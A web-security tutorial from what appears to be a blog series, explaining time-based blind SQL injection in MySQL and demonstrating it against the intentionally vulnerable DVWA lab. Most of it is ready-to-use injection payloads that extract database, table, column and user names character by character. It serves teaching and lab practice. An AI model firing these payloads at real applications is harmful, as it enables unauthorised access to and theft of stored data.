Time Based SQL Injection Explained | SQL Injection Series | Web Security

Introduction

As we know that if web application does not return any visible error when the SQL query fails, then we use Boolean based SQL injection. In boolean based SQL injection we simply ask questions from the database in the form of “true or false” statements and according to the response of web application, we can enumerate the database. But lets assume that in the web application there is no distinction between the results of true and false statements and there are absolutely no errors returned from the database. Now in this situation the boolean based injection did not work. So in this this situation we have to perform time-based SQL injection.

The time-based SQL injection relies on sending an SQL query to the database, which forces the database to wait for a specified amount of time (in seconds) before responding and the response time will indicate to the attacker whether the result of the query is TRUE or FALSE. If the page is not vulnerable, it will load quickly; if it is vulnerable it will take longer than usual to load. This enables the attacker to extract data, even though there are no visible changes on the page.

For example if the database name is “dvwa” then it will delay for 10 seconds, otherwise no delay and if the table name is “users” then it will delay for 5 seconds, or not. So in time-based injection, for a statement that is true, a delay would be included and for a statement that is false, there was no delay or vary little delay would be included. Depending on the database, there are built-in functions available that would delay the response, for example in Mysql sleep() function, in MSSQL server waitfordelay() function, and in postgresql pg_sleep() function.

Basic SQL Commands

Now lets look at the basic concepts of how time based sql injection works. I will be testing below commands on mysql console. In mysql database the time-based sql injection is perform sleep() within if() condition. First lets look at sleep() function.

Sleep() function : The sleep function pause the response of database for given number of seconds. For example :

At above example the would be delayed for 5 seconds.

If() condition : The structure of if() condition in mysql is :

if(condition, value_if_true, value_if_false)

Means if the condition is true then the code at value_if_true is executes otherwise the code at value_if_false will execute. For example :

The above example example will return 40 because the condition (20 > 40) is false. Now lets run the below statement :

select if((select database()) = "dvwa", sleep(5), null);

At above statement if the database name is dvwa then it will output for 5 seconds or not.

We can also use the above statement with substr() to enumerate the data from database, for example :

select if(substr((select database()), 1, 1) = "d", sleep(5), null);
select if(substr((select database()), 2, 1) = "v", sleep(5), null);
select if(substr((select database()), 3, 1) = "w", sleep(5), null);
select if(substr((select database()), 4, 1) = "a", sleep(5), null);
select if((select database()) like "s%", sleep(2), null);
select if((select database()) like "%e$", sleep(3), null);
select if((select version()) like "5%", sleep(5), null);

Now lets try the above queries with the web application.

Exploiting Boolasn Based SQL Injection

For demonstration we are going to use DVWA Vulnerable Web App. To know more about DVWA or install it on your system pleas visit the Setting up Web Pentesting Lab. At DVWA we are going to use the SQL Injection example for the demonstration and also set the security level to low in DVWA.

Now at DVWA we are going to use the SQL Injection (Blind) example for the demonstration and also set the security level to low in DVWA.

In this example if we put the user ID then it will show the details of user.

Now lets put the below statement on the user id box.

1' and (select if((database())="dvwa", sleep(5), null)) #

Now as we can see the web application will waiting for the response from the database server, it means that our query is true. We at here we can also enumerate the name of the database one by one character, as we can see in the boolean based injection. For example :

1' and (select if(substr(database(), 1, 1)="d", sleep(5), null)) #

And also with ascii function :

1' and (select if(ascii(substr(database(), 1, 1))="100", sleep(5), null)) #

Some queries are :

1' and (select if((database()) like "d%", sleep(2), null)) #
1' and (select if((version()) like "5%", sleep(5), null)) #

Query for extracting table name :

1' and (select if((select substr(table_name, 1, 1) from information_schema.tables where table_schema=database() limit 0, 1)="g", sleep(5), null)) #
1' and (select if((select substr(table_name, 2, 1) from information_schema.tables where table_schema=database() limit 0, 1)="u", sleep(5), null)) #

The first table name is guestbook. Also with ascii function :

1' and (select if(ascii((select substr(table_name, 1, 1) from information_schema.tables where table_schema=database() limit 0, 1))="103", sleep(5), null)) #

Query for extracting column name :

1' and (select if((select substr(column_name, 1, 1) from information_schema.columns where table_name="guestbook" limit 0, 1)="c", sleep(5), null)) #
1' and (select if((select substr(column_name, 2, 1) from information_schema.columns where table_name="guestbook" limit 0, 1)="o", sleep(5), null)) #
1' and (select if(ascii((select substr(column_name, 1, 1) from information_schema.columns where table_name="guestbook" limit 0, 1))="99", sleep(5), null)) #

Query for extracting users data :

first user name is admin :

1' and (select if((select substr(user, 1, 1) from users limit 0, 1)="a", sleep(5), null)) #
1' and (select if((select substr(user, 2, 1) from users limit 0, 1)="d", sleep(5), null)) #
1' and (select if(ascii((select substr(user, 1, 1) from users limit 0, 1))="97", sleep(5), null)) #
1' and (select if(ascii((select substr(user, 2, 1) from users limit 0, 1))="100", sleep(5), null)) #

Also note that this attack is typically slow (especially on large databases) since an attacker would need to enumerate a database character by character.

Conclusion

In this post we look at some basic concepts of Time-based SQL injection.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.